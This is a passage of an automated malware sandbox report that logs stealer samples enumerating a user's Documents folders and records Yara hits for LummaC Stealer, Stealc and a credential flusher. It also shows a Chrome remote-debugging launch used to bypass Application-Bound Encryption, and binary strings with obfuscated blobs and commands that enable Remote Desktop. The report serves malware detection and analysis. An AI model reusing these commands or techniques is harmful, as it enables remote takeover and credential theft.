Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX

Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: number of queries: 1001
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: number of queries: 2002

Source: Yara match	File source: 0000000B.00000003.2690845654.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2690960983.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2773819917.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2773670606.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2774094257.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2773960939.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cd2469328d.exe PID: 7820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5cda6c90d7.exe PID: 5040, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 142c991362.exe PID: 7012, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 2e4e1b8516.exe PID: 4904, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: cd2469328d.exe PID: 7820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5cda6c90d7.exe PID: 5040, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 0000002B.00000003.3493806478.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 35f0a75b93.exe PID: 7748, type: MEMORYSTR

Contains functionality to start a terminal service

Source: 7739517025.exe, 0000000D.00000000.2660444929.0000000000581000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: net start termservice
Source: 7739517025.exe, 0000000D.00000000.2660444929.0000000000581000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: 7739517025.exe, 0000000D.00000002.2668628648.0000000000581000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: net start termservice
Source: 7739517025.exe, 0000000D.00000002.2668628648.0000000000581000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: 7739517025.exe, 0000000D.00000003.2664537518.0000000007061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: net start termservice
